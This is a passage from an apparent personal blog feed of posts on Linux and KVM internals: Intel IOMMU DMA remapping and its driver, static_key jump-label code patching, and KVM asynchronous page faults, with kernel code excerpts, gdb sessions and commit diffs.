int iommu_coherency;/* indicate coherency of iommu access */
int iommu_snooping; /* indicate snooping control feature*/
int iommu_count; /* reference count of iommu */
int iommu_superpage;/* Level of superpages supported:
0 == 4KiB (no superpages), 1 == 2MiB,
2 == 1GiB, 3 == 512GiB, 4 == 1TiB */
u64 max_addr; /* maximum mapped address */
struct iommu_domain domain; /* generic domain data structure for
iommu core */
};
</code></pre></div></div>
<p>‘iovad’ contains an rb-tree holding all of the IOVAs for the domain. ‘pgd’ is the page table directory for the IOVA-to-physical-address translation. ‘domain’ contains the generic domain data structure. The domain is allocated in ‘get_domain_for_dev’.</p>
<p>In ‘get_domain_for_dev’, the domain is allocated by calling ‘alloc_domain’ and initialized by calling ‘domain_init’.
In ‘domain_init’, ‘init_iova_domain’ initializes ‘iovad’, setting the start pfn of the IOVA space to 1 and the end pfn to 4G. ‘domain_reserve_special_ranges’ is used to reserve the special ranges in ‘reserved_iova_list’; this means an IOVA can never be an address in this list. ‘alloc_pgtable_page’ allocates a page as the page table directory and stores it in ‘domain->pgd’.</p>
<p>In ‘get_domain_for_dev’, ‘dmar_insert_one_dev_info’ is called to allocate a ‘device_domain_info’ and store it in the device’s archdata.iommu field. At the end of ‘dmar_insert_one_dev_info’, there is an important step: calling ‘domain_context_mapping’. ‘domain_context_mapping’ calls ‘domain_context_mapping_one’ to set up the IOMMU DMA remapping page table. In ‘domain_context_mapping_one’, ‘iommu_context_addr’ is called to get the context entry in the context table, then ‘context_set_address_root’ sets the context entry to the physical address of the domain’s pgd.</p>
<p>After getting/creating the domain, ‘__intel_map_single’ calls ‘intel_alloc_iova’ to allocate the requested size of IOVA range in this domain, then calls ‘domain_pfn_mapping’ to set up the mapping; ‘__domain_mapping’ does the actual work.</p>
<p>In ‘__domain_mapping’, ‘pfn_to_dma_pte’ allocates the not-yet-present pte for the IOVA address, and the pte is then set accordingly. After ‘__domain_mapping’, we have a page table which translates the IOVA to a physical address.</p>
<p>Following figure shows the data structure relation.</p>
<p><img src="/assets/img/iommu_driver/4.png" alt="" /></p>
<p>With the iommu, we can see that the DMA address is 0xffffxxxx while the host physical address is 0x384f2000.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>(gdb) b vtd_iommu_translate
Breakpoint 2 at 0x5555572724f2: file /home/test/qemu5/qemu/hw/i386/intel_iommu.c, line 2882.
(gdb) c
Continuing.
Thread 1 "qemu-system-x86" hit Breakpoint 2, vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
2882 {
(gdb) finish
Run till exit from #0 vtd_iommu_translate (iommu=0x61a000019ef0, addr=4294951088, flag=IOMMU_WO, iommu_idx=0) at /home/test/qemu5/qemu/hw/i386/intel_iommu.c:2882
address_space_translate_iommu (iommu_mr=0x61a000019ef0, xlat=0x7fffffffc420, plen_out=0x7fffffffc3e0, page_mask_out=0x0, is_write=true, is_mmio=true, target_as=0x7fffffffc290, attrs=...) at /home/test/qemu5/qemu/exec.c:493
493 if (!(iotlb.perm & (1 << is_write))) {
Value returned is $5 = {target_as = 0x55555ad79380 <address_space_memory>, iova = 4294950912, translated_addr = 944709632, addr_mask = 4095, perm = IOMMU_RW}
(gdb) p /x $5
$6 = {target_as = 0x55555ad79380, iova = 0xffffc000, translated_addr = 0x384f2000, addr_mask = 0xfff, perm = 0x3}
</code></pre></div></div>
<p>Without the iommu, we can see the dma address is just the host physical address.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Thread 4 "qemu-system-x86" hit Breakpoint 1, pci_dma_write (dev=0x7fffa3eba800, addr=946098204, buf=0x7fffe4ba6bbc, len=4) at /home/test/qemu5/qemu/include/hw/pci/pci.h:795
795 return pci_dma_rw(dev, addr, (void *) buf, len, DMA_DIRECTION_FROM_DEVICE);
(gdb) p /x addr
$1 = 0x3864501c
(gdb)
</code></pre></div></div>
IOMMU introduction2019-08-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/04/iommu-introduction
<p>The MMU is used by the CPU to translate a virtual address to a physical address; the virtual address the MMU sees is from the CPU’s view. The IOMMU, in contrast, is used by a device to translate another virtual address, called an IOVA (IO virtual address), to a physical address. The following shows
the basic idea of the IOMMU.</p>
<p><img src="/assets/img/iommu/1.png" alt="" /></p>
<p>The IOMMU is very useful for device assignment on virtual machine platforms. Device assignment directly assigns a physical IO device to a VM: the driver for an assigned IO device runs in the VM to which it is assigned and is allowed to interact directly with the device hardware with minimal or no VMM involvement. Device assignment has very high performance compared with software-based device emulation and virtio-based device emulation.</p>
<p>Device assignment introduces an issue similar to how a virtual machine accesses its physical memory.
In a virtual machine environment, the OS in the VM uses virtual addresses to access data; this guest virtual address (GVA) is translated to a guest physical address (GPA). However, the data actually lives at a host physical address, and this translation is done by EPT in VT-x hardware. For device assignment, the driver in the guest OS specifies guest physical addresses for DMA, but the physical IO device needs host physical addresses for its accesses. So the device needs something like EPT to translate the DMA address (GPA) specified by the driver in the guest OS to a host physical address. This is the main purpose of the IOMMU.
The IOMMU also has the ability to isolate and restrict device accesses to the resources owned by the virtual machine (for example, the physical memory allocated to the VM). The following figure depicts how system software interacts with hardware support for both VT-x and VT-d.</p>
<p><img src="/assets/img/iommu/2.png" alt="" /></p>
<p>Intel IOMMU(also called VT-d) has the following capabilities:</p>
<ul>
<li>DMA remapping: this supports address translations for DMA from device.</li>
<li>Interrupt remapping: this supports isolation and routing of interrupts from devices and external interrupt controllers to appropriate VMs.</li>
<li>Interrupt posting: this supports direct delivery of virtual interrupts from devices and external interrupt controllers to virtual processors.</li>
</ul>
<p>qemu/kvm virtual machines now use VFIO to do device assignment. VFIO utilizes the IOMMU’s DMA remapping to do DMA in the VM, but it doesn’t use interrupt remapping, as it is not efficient compared with the in-kernel irqfd, IMO.</p>
<p>The basic idea of IOMMU DMA remapping is the same as the MMU’s address translation.
When a physical IO device does DMA, the address it uses is an IOVA. The IOMMU first uses the device’s address (the PCI BDF) to find a page table, then uses the IOVA to walk this page table and finally gets the host physical address. This is very much like how the MMU translates a virtual address to a physical address. The following figure shows the basic idea of DMA remapping; this is the legacy mode. There is also a scalable mode: though the details differ, the idea is the same.</p>
<p><img src="/assets/img/iommu/3.png" alt="" /></p>
<p>The device’s bus number is used to index into the Root Table; the root table is 4 KB in size and contains 256 root-entries. Each root-entry contains the context-table pointer, which references the context table for all the devices on the bus identified by that root-entry.</p>
<p>A context-entry maps a specific I/O device on a bus to the domain to which it is assigned, and, in
turn, to the address translation structures for the domain. Each context-table contains 256 entries,
with each entry corresponding to a PCI device function on the bus. For a PCI device, the device and
function numbers (lower 8-bits) are used to index into the context-table.</p>
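<p>The two-level indexing above can be sketched as follows: the 16-bit source-id of a DMA request is the device’s BDF, the high byte picks the root-entry and the low byte (devfn) picks the context-entry. This is a simplified sketch of legacy mode only:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdint.h>

/* source-id layout: bus[15:8] | device[7:3] | function[2:0] */
static inline unsigned int root_index(uint16_t source_id)
{
    return source_id >> 8;        /* bus number, 256 root entries */
}

static inline unsigned int context_index(uint16_t source_id)
{
    return source_id & 0xff;      /* devfn, 256 context entries */
}
</code></pre></div></div>
<p>For our vmxnet card at 03:00.0 the source-id is 0x0300, so root-entry 3 and context-entry 0 are used.</p>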
<p>The root table and context table are set up by the IOMMU driver; the page table is usually set up by the VMM. Of course, any process can set up this page table. The IOVA is used as the input of the IOMMU translation; this address is the device’s view of the address. The IOVA can be any address that is meaningful for the guest or process. For example, qemu/kvm uses the GPA as the IOVA, but you could use another address as the IOVA. VFIO uses the IOMMU to do the translation from GPA to HPA.</p>
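<p>Once the context entry is found, the last step is just a page-table walk keyed by the IOVA. The toy single-level walk below illustrates the translation contract; real VT-d page tables have 3 to 5 levels and more permission bits, so this is only a sketch:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdint.h>

#define PTE_PRESENT 1ULL

/* Toy one-level walk: 512 entries, 4 KB pages. Returns the host
 * physical address for an IOVA, or -1 on a translation fault. */
static uint64_t toy_translate(const uint64_t *page_table, uint64_t iova)
{
    uint64_t pte = page_table[(iova >> 12) & 0x1ff];
    if (!(pte & PTE_PRESENT))
        return (uint64_t)-1;                   /* DMA remapping fault */
    return (pte & ~0xfffULL) | (iova & 0xfff); /* frame + page offset */
}
</code></pre></div></div>
<p>A non-present pte triggers a fault instead of an access, which is how the IOMMU isolates a device from memory that was never mapped for it.</p>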
<p>Next I will write a code analysis of the intel IOMMU driver. I will also write a post on the iommu hardware implementation, as qemu implements both the amd and intel iommu.</p>
Linux static_key internals2019-07-20T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/07/20/linux-static-key-internals
<h3> static_key introduction </h3>
<p>There is often a situation where we need to check some switch to determine which code path to execute. In some cases the switch almost always has the same value (true or false), so the check may hurt performance. static_key and jump labels let us patch the code at the address where the check would be. With a static_key there is no check, just straight-line code flow. There are a lot of introductions to static_key usage, but little about the internals. This post tries to explain the static_key machinery under the surface. It uses kernel 4.4, as that is the code I have at hand now.</p>
<p>There are three aspects for static_key:</p>
<ol>
<li>We need to save the static_key information in the ELF file; this information is stored in the ‘__jump_table’ section of the ELF file</li>
<li>The kernel needs to parse this ‘__jump_table’ information</li>
<li>When we change the switch, the kernel needs to update the patched code</li>
</ol>
<p>The idea of static_key is illustrated as following:</p>
<p><img src="/assets/img/static_key/1.png" alt="" /></p>
<p>In most situations the switch is in its ‘mostly’ state, so the red block is a nop. When we change the state of the switch, the kernel updates the red block to a jump instruction so that execution goes to code flow ‘2’.</p>
<h3> Store static_key information in ELF file </h3>
<p>static_key is defined by a ‘struct static_key’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key {
atomic_t enabled;
/* Set lsb bit to 1 if branch is default true, 0 otherwise */
struct jump_entry *entries;
#ifdef CONFIG_MODULES
struct static_key_mod *next;
#endif
};
</code></pre></div></div>
<p>‘enabled’ indicates the state of the static_key: 0 means false and 1 means true. ‘entries’ contains the patching information of the jump label, which is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct jump_entry {
jump_label_t code;
jump_label_t target;
jump_label_t key;
};
</code></pre></div></div>
<p>‘code’ is the address to be patched, ‘target’ is where we should jump to, and ‘key’ is the address of the static_key.</p>
<p>The ‘next’ field in static_key is used when modules reference static_keys defined in the kernel image or in other modules.</p>
<p>Let’s use the ‘apic_sw_disabled’ in arch/x86/kvm/lapic.c as an example. It is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key_deferred apic_sw_disabled __read_mostly;
</code></pre></div></div>
<p>Here ‘static_key_deferred’ is just a wrapper around static_key; it adds a ‘timeout’ and a delayed work item so that the update can be performed from a delayed work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct static_key_deferred {
struct static_key key;
unsigned long timeout;
struct delayed_work work;
};
</code></pre></div></div>
<p>‘apic_sw_disabled’ indicates whether system software has enabled the local apic; in most cases the software will enable it, so the default of ‘apic_sw_disabled’ is false. Notice that ‘apic_sw_disabled’ is shared by all vcpus: if any vcpu on the host disables its local apic, ‘apic_sw_disabled’ becomes true.</p>
<p>In ‘kvm_apic_sw_enabled’, it calls ‘static_key_false’ on ‘apic_sw_disabled.key’. ‘static_key_false’ just calls ‘arch_static_branch’, and the latter is as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
{
asm_volatile_goto("1:"
".byte " __stringify(STATIC_KEY_INIT_NOP) "\n\t"
".pushsection __jump_table, \"aw\" \n\t"
_ASM_ALIGN "\n\t"
_ASM_PTR "1b, %l[l_yes], %c0 + %c1 \n\t"
".popsection \n\t"
: : "i" (key), "i" (branch) : : l_yes);
return false;
l_yes:
return true;
}
</code></pre></div></div>
<p>‘STATIC_KEY_INIT_NOP’ is a 5-byte no-op instruction, ‘0x0f,0x1f,0x44,0x00,0x00’. This is the red block in the first picture. The data between ‘.pushsection’ and ‘.popsection’ ends up in the ‘__jump_table’ section. For every arch_static_branch call there are three unsigned long values in ‘__jump_table’. The first is the address of ‘1b’, i.e. the address of the 5-byte no-op instruction. The second is the address of ‘l_yes’, and the third is the static_key’s address ORed with the branch value (false for static_key_false, true for static_key_true).</p>
<p>‘static_key_false’ and ‘arch_static_branch’ are always inlined, so ‘kvm_apic_sw_enabled’ is compiled into the following asm instructions.</p>
<p><img src="/assets/img/static_key/2.png" alt="" /></p>
<p>Notice we have marked ‘kvm_apic_sw_enabled’ as noinline by adding ‘noinline’ to the function signature.</p>
<p>As the instruction at ‘13f70’ is a no-op, ‘kvm_apic_sw_enabled’ always returns 1 here, which is correct.</p>
<p>Also, after ‘arch_static_branch’ is compiled, there are three unsigned long values in ‘__jump_table’, laid out as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> |no-op address | target address | static_key's address ored with 0|
</code></pre></div></div>
<p>In this function it is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> |13f79 | 13f85| kvm_apic_sw_enabled.key's address|
</code></pre></div></div>
<p>These three values correspond to a ‘jump_entry’. The address of kvm_apic_sw_enabled.key is a global address.</p>
<p>Notice here ‘13f79’ is just an offset within the kvm.ko file. During module loading, it will be relocated.</p>
<h3> Parses '__jump_table' when startup </h3>
<p>In ‘start_kernel’ the kernel calls ‘jump_label_init’ to parse the ‘__jump_table’. For modules, ‘jump_label_init_module’ registers a module notifier named ‘jump_label_module_nb’; when a module is loaded, it calls ‘jump_label_add_module’ to parse the module’s ‘__jump_table’. We will dig into the module case. ‘jump_label_add_module’s code is following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int jump_label_add_module(struct module *mod)
{
struct jump_entry *iter_start = mod->jump_entries;
struct jump_entry *iter_stop = iter_start + mod->num_jump_entries;
struct jump_entry *iter;
struct static_key *key = NULL;
struct static_key_mod *jlm;
/* if the module doesn't have jump label entries, just return */
if (iter_start == iter_stop)
return 0;
jump_label_sort_entries(iter_start, iter_stop);
for (iter = iter_start; iter < iter_stop; iter++) {
struct static_key *iterk;
iterk = jump_entry_key(iter);
if (iterk == key)
continue;
key = iterk;
if (within_module(iter->key, mod)) {
/*
* Set key->entries to iter, but preserve JUMP_LABEL_TRUE_BRANCH.
*/
*((unsigned long *)&key->entries) += (unsigned long)iter;
key->next = NULL;
continue;
}
...
}
return 0;
}
</code></pre></div></div>
<p>‘iter_start’ points to the first jump entry and ‘iter_stop’ points past the last one.
The jump entries are sorted by the ‘jump_label_sort_entries’ function. We can get the static_key of a ‘jump_entry’ by calling the ‘jump_entry_key’ function. Notice the third field of ‘jump_entry’ is the address of the static_key ORed with 0 or 1, so ‘jump_entry_key’ clears the lowest bit.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline struct static_key *jump_entry_key(struct jump_entry *entry)
{
return (struct static_key *)((unsigned long)entry->key & ~1UL);
}
</code></pre></div></div>
<p>Later, if the static_key is defined in this module, ‘jump_label_add_module’ sets the static_key’s entries to the address of its ‘jump_entry’. If the static_key is defined in another module (or in the kernel image), the ‘next’ field of ‘static_key’ is used to record this.</p>
<p>After calling ‘jump_label_add_module’, the ‘static_key’ and ‘jump_entry’ have the following relation.</p>
<p><img src="/assets/img/static_key/3.png" alt="" /></p>
<h4> patch the function </h4>
<p>So far the function ‘kvm_apic_sw_enabled’ returns true, meaning ‘apic_sw_disabled.key’ is false. However, at some point we need to change ‘apic_sw_disabled.key’ to true. For example, ‘kvm_create_lapic’ has the following statement:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static_key_slow_inc(&apic_sw_disabled.key);
</code></pre></div></div>
<p>This means when creating lapic, we need to set ‘apic_sw_disabled.key’ to true.</p>
<p>‘static_key_slow_inc’ calls ‘jump_label_update’ to patch the code, and also sets the ‘static_key’s enabled to 1.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void jump_label_update(struct static_key *key)
{
struct jump_entry *stop = __stop___jump_table;
struct jump_entry *entry = static_key_entries(key);
#ifdef CONFIG_MODULES
struct module *mod;
__jump_label_mod_update(key);
preempt_disable();
mod = __module_address((unsigned long)key);
if (mod)
stop = mod->jump_entries + mod->num_jump_entries;
preempt_enable();
#endif
/* if there are no users, entry can be NULL */
if (entry)
__jump_label_update(key, entry, stop);
}
</code></pre></div></div>
<p>‘jump_label_update’ gets the ‘jump_entry’ from the ‘static_key’s ‘entries’ field. ‘stop’ is either ‘__stop___jump_table’ or the end of the jump entries of the module the static_key belongs to. Then it calls ‘__jump_label_update’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __jump_label_update(struct static_key *key,
struct jump_entry *entry,
struct jump_entry *stop)
{
for (; (entry < stop) && (jump_entry_key(entry) == key); entry++) {
/*
* entry->code set to 0 invalidates module init text sections
* kernel_text_address() verifies we are not in core kernel
* init code, see jump_label_invalidate_module_init().
*/
if (entry->code && kernel_text_address(entry->code))
arch_jump_label_transform(entry, jump_label_type(entry));
}
}
</code></pre></div></div>
<p>After the check, this function calls ‘arch_jump_label_transform’ with the return value of ‘jump_label_type’. The ‘jump_label_type’ function returns the jump type, which tells us whether to use a nop or a jump.
There are two jump types in kernel 4.4: JUMP_LABEL_NOP (0) and JUMP_LABEL_JMP (1).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> enum jump_label_type {
JUMP_LABEL_NOP = 0,
JUMP_LABEL_JMP,
};
</code></pre></div></div>
<p>‘jump_label_type’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static enum jump_label_type jump_label_type(struct jump_entry *entry)
{
struct static_key *key = jump_entry_key(entry);
bool enabled = static_key_enabled(key);
bool branch = jump_entry_branch(entry);
/* See the comment in linux/jump_label.h */
return enabled ^ branch;
}
</code></pre></div></div>
<p>Here ‘enabled’ is -1 (0xffffffff), which was set in ‘static_key_slow_inc’; ‘branch’ depends on which function was used, here 0 (static_key_false), so ‘jump_label_type’ returns 1.</p>
<p>‘arch_jump_label_transform’ calls ‘__jump_label_transform’ with the type(1, JUMP_LABEL_JMP), poker(NULL), and init(NULL). So the calling code will be:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __jump_label_transform(struct jump_entry *entry,
enum jump_label_type type,
void *(*poker)(void *, const void *, size_t),
int init)
{
union jump_code_union code;
const unsigned char default_nop[] = { STATIC_KEY_INIT_NOP };
const unsigned char *ideal_nop = ideal_nops[NOP_ATOMIC5];
if (type == JUMP_LABEL_JMP) {
if (init) {
...
} else {
/*
* ...otherwise expect an ideal_nop. Otherwise
* something went horribly wrong.
*/
if (unlikely(memcmp((void *)entry->code, ideal_nop, 5)
!= 0))
bug_at((void *)entry->code, __LINE__);
}
code.jump = 0xe9;
code.offset = entry->target -
(entry->code + JUMP_LABEL_NOP_SIZE);
} else {
...
}
...
if (poker)
(*poker)((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE);
else
text_poke_bp((void *)entry->code, &code, JUMP_LABEL_NOP_SIZE,
(void *)entry->code + JUMP_LABEL_NOP_SIZE);
}
</code></pre></div></div>
<p>‘code’ contains the jump instruction: the first byte is ‘0xe9’ and the following four bytes are the offset to jump. Finally, ‘__jump_label_transform’ calls ‘text_poke_bp’ to rewrite the 5 bytes at ‘jump_entry->code’ as a jump to the other branch. The ‘kvm_apic_sw_enabled’ function will then return ‘apic->sw_enabled’. In ‘static_key_slow_inc’, after ‘jump_label_update’, ‘key->enabled’ is set to 1.</p>
<p>‘apic_sw_disabled.key’ is later decremented by ‘static_key_slow_dec_deferred’ in ‘apic_set_spiv’.
The delayed work eventually calls ‘__static_key_slow_dec’, which decreases ‘key->enabled’; after that ‘enabled ^ branch’ becomes 0, so ‘__jump_label_transform’ patches the code back to the no-op instruction.</p>
<h3> Reference </h3>
<p>[1] <a href="https://github.com/torvalds/linux/blob/master/Documentation/static-keys.txt">kernel static_key doc</a></p>
<p>[2] <a href="https://github.com/linux-wmt/linux-vtwm/commit/fd4363fff3d96795d3feb1b3fb48ce590f186bdd">int3-based instruction patching</a></p>
KVM async page fault2019-03-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/03/24/kvm-async-page-fault
<h3> apf introduction </h3>
<p>A qemu/kvm VM’s physical memory is the virtual memory of the qemu process. Once qemu’s virtual memory has been committed and backed with physical memory, the host can swap that physical memory out. When a guest vcpu accesses memory swapped out by the host, its execution is suspended until the memory is swapped back in. Asynchronous page fault (apf) is a way to use the guest vcpu more efficiently by allowing it to execute other tasks while the page is brought back into memory[1]. The following gives a summary of these processes.</p>
<ol>
<li>
<p>page fault when the EPT page table is not setup</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_unlocked()
no previously mapped page and no swap entry found
empty page is allocated
5. page is added into shadow/nested page table
</code></pre></div> </div>
</li>
<li>
<p>page fault when the physical memory is swapped out(without apf)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_unlocked()
swap entry is found
page swap-in process is initiated
vcpu thread goes to sleep until page is swapped in
</code></pre></div> </div>
</li>
<li>
<p>page fault when the physical memory is swapped out (with apf)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. VMEXIT
2. kvm_mmu_page_fault()
3. gfn_to_pfn()
4. get_user_pages_nowait()
5. gup is done by dedicated thread, inject 'page not present' exception to guest
6. guest puts process A(which caused this page fault) to sleep and schedule another process
7. page is swapped in, inject 'page ready' exception to guest
8. guest can schedule process A back to run on vcpu
</code></pre></div> </div>
</li>
</ol>
<p>The following figure shows the process of a kvm async page fault.[2]</p>
<p><img src="/assets/img/apf/1.jpg" alt="" /></p>
<p>From this description we know that kvm apf needs cooperation from the guest: the guest must recognize the apf ‘page not present’ and ‘page ready’ exceptions, and the paravirtualized guest should hook the exception handler to process these two new exceptions. apf consists of the following steps.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. the guest should be initialized to process the new exception
2. kvm page fault handler should recognize the swapped out case and initialize a work to swap in the page, inject a 'page not present' to guest
3. the guest receive this exception and schedule another process to run
4. when the page caused page fault in step 2 has been swapped in, the kvm inject a 'page ready' exception to guest
5. the guest can do schedule to run process that was blocked by page fault in step 2
</code></pre></div></div>
<p>In the next part I will discuss the code behind the above process.</p>
<h3> detail of apf </h3>
<h4> para guest initialization when startup </h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=fd10cde9294f73eeccbc16f3fec1ae6cde7b800c">KVM paravirt: Add async PF initialization to PV guest.</a></p>
<p>Here we can see that apf is enabled by default and can be disabled with the ‘no-kvmapf’ parameter on the kernel command line.</p>
<p>Every CPU has a per-cpu variable named ‘apf_reason’, defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +struct kvm_vcpu_pv_apf_data {
+ __u32 reason;
+ __u8 pad[60];
+ __u32 enabled;
+};
</code></pre></div></div>
<p>The ‘reason’ here is the apf exception reason, either ‘KVM_PV_REASON_PAGE_NOT_PRESENT’ (1) or ‘KVM_PV_REASON_PAGE_READY’ (2); ‘enabled’ indicates the status of apf.</p>
<p>If kvm supports apf, the ‘KVM_CPUID_FEATURES’ cpuid leaf has the ‘KVM_FEATURE_ASYNC_PF’ feature. When the guest detects this feature, it writes the physical address of ‘apf_reason’ to the msr ‘MSR_KVM_ASYNC_PF_EN’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +void __cpuinit kvm_guest_cpu_init(void)
+{
+ if (!kvm_para_available())
+ return;
+
+ if (kvm_para_has_feature(KVM_FEATURE_ASYNC_PF) && kvmapf) {
+ u64 pa = __pa(&__get_cpu_var(apf_reason));
+
+ wrmsrl(MSR_KVM_ASYNC_PF_EN, pa | KVM_ASYNC_PF_ENABLED);
+ __get_cpu_var(apf_reason).enabled = 1;
+ printk(KERN_INFO"KVM setup async PF for cpu %d\n",
+ smp_processor_id());
+ }
+}
</code></pre></div></div>
<h4> guest process the apf exception </h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=631bc4878220932fe67fc46fc7cf7cccdb1ec597">KVM: Handle async PF in a guest</a></p>
<p>During initialization, the guest sets trap_init to ‘kvm_apf_trap_init’, and that function sets gate 14’s (page fault) handler to ‘async_page_fault’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static void __init kvm_apf_trap_init(void)
+{
+ set_intr_gate(14, &async_page_fault);
+}
</code></pre></div></div>
<p>‘async_page_fault’ calls ‘do_async_page_fault’. The latter function first reads the apf reason:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +u32 kvm_read_and_reset_pf_reason(void)
+{
+ u32 reason = 0;
+
+ if (__get_cpu_var(apf_reason).enabled) {
+ reason = __get_cpu_var(apf_reason).reason;
+ __get_cpu_var(apf_reason).reason = 0;
+ }
+
+ return reason;
+}
+dotraplinkage void __kprobes
+do_async_page_fault(struct pt_regs *regs, unsigned long error_code)
+{
+ switch (kvm_read_and_reset_pf_reason()) {
+ default:
+ do_page_fault(regs, error_code);
+ break;
+ case KVM_PV_REASON_PAGE_NOT_PRESENT:
+ /* page is swapped out by the host. */
+ kvm_async_pf_task_wait((u32)read_cr2());
+ break;
+ case KVM_PV_REASON_PAGE_READY:
+ kvm_async_pf_task_wake((u32)read_cr2());
+ break;
+ }
+}
+
</code></pre></div></div>
<p>The apf reason is written to the ‘apf_reason.reason’ field by kvm and the guest reads it out. When the reason is ‘KVM_PV_REASON_PAGE_NOT_PRESENT’, the guest calls ‘kvm_async_pf_task_wait’, which adds the current process to a sleep list and reschedules. When the guest receives ‘KVM_PV_REASON_PAGE_READY’, it calls ‘kvm_async_pf_task_wake’ to wake up the sleeping process.</p>
<h4> kvm support the apf cpuid feature and msr</h4>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=344d9588a9df06182684168be4f1408b55c7da3e">KVM: Add PV MSR to enable asynchronous page faults delivery</a></p>
<p>As we discussed, kvm should support the ‘KVM_FEATURE_ASYNC_PF’ cpuid feature and the msr ‘MSR_KVM_ASYNC_PF_EN’.</p>
<p>When the guest writes to the msr ‘MSR_KVM_ASYNC_PF_EN’, the kvm module calls ‘kvm_pv_enable_async_pf’. This function saves the written value in the vcpu arch field ‘apf.msr_val’. ‘kvm_gfn_to_hva_cache_init’ creates a ‘cache’ for the gpa-to-hva mapping of ‘apf_reason’ so that kvm can write data to the guest more efficiently.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static int kvm_pv_enable_async_pf(struct kvm_vcpu *vcpu, u64 data)
+{
+ gpa_t gpa = data & ~0x3f;
+
+ /* Bits 1:5 are resrved, Should be zero */
+ if (data & 0x3e)
+ return 1;
+
+ vcpu->arch.apf.msr_val = data;
+
+ if (!(data & KVM_ASYNC_PF_ENABLED)) {
+ kvm_clear_async_pf_completion_queue(vcpu);
+ kvm_async_pf_hash_reset(vcpu);
+ return 0;
+ }
+
+ if (kvm_gfn_to_hva_cache_init(vcpu->kvm, &vcpu->arch.apf.data, gpa))
+ return 1;
+
+ kvm_async_pf_wakeup_all(vcpu);
+ return 0;
+}
+
</code></pre></div></div>
<h4> kvm do the apf work </h4>
<p>There are two commits in this part.
commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=af585b921e5d1e919947c4b1164b59507fe7cd7b">KVM: Halt vcpu if page it tries to access is swapped out</a> sets up the framework of apf.</p>
<p>commit: <a href="https://git.kernel.org/pub/scm/virt/kvm/kvm.git/commit/?id=7c90705bf2a373aa238661bdb6446f27299ef489">KVM: Inject asynchronous page fault into a PV guest if page is swapped out</a> does the final work.</p>
<p>Let’s first look at the first commit.</p>
<p>Every apf work item is represented by the following structure.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +struct kvm_async_pf {
+ struct work_struct work;
+ struct list_head link;
+ struct list_head queue;
+ struct kvm_vcpu *vcpu;
+ struct mm_struct *mm;
+ gva_t gva;
+ unsigned long addr;
+ struct kvm_arch_async_pf arch;
+ struct page *page;
+ bool done;
+};
</code></pre></div></div>
<p>apf occurs during page fault handling, in the ‘tdp_page_fault’ function, so this commit adds a call to a new function ‘try_async_pf’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +static bool try_async_pf(struct kvm_vcpu *vcpu, gfn_t gfn, gva_t gva,
+ pfn_t *pfn)
+{
+ bool async;
+
+ *pfn = gfn_to_pfn_async(vcpu->kvm, gfn, &async);
+
+ if (!async)
+ return false; /* *pfn has correct page already */
+
+ put_page(pfn_to_page(*pfn));
+
+ if (can_do_async_pf(vcpu)) {
+ trace_kvm_try_async_get_page(async, *pfn);
+ if (kvm_find_async_pf_gfn(vcpu, gfn)) {
+ trace_kvm_async_pf_doublefault(gva, gfn);
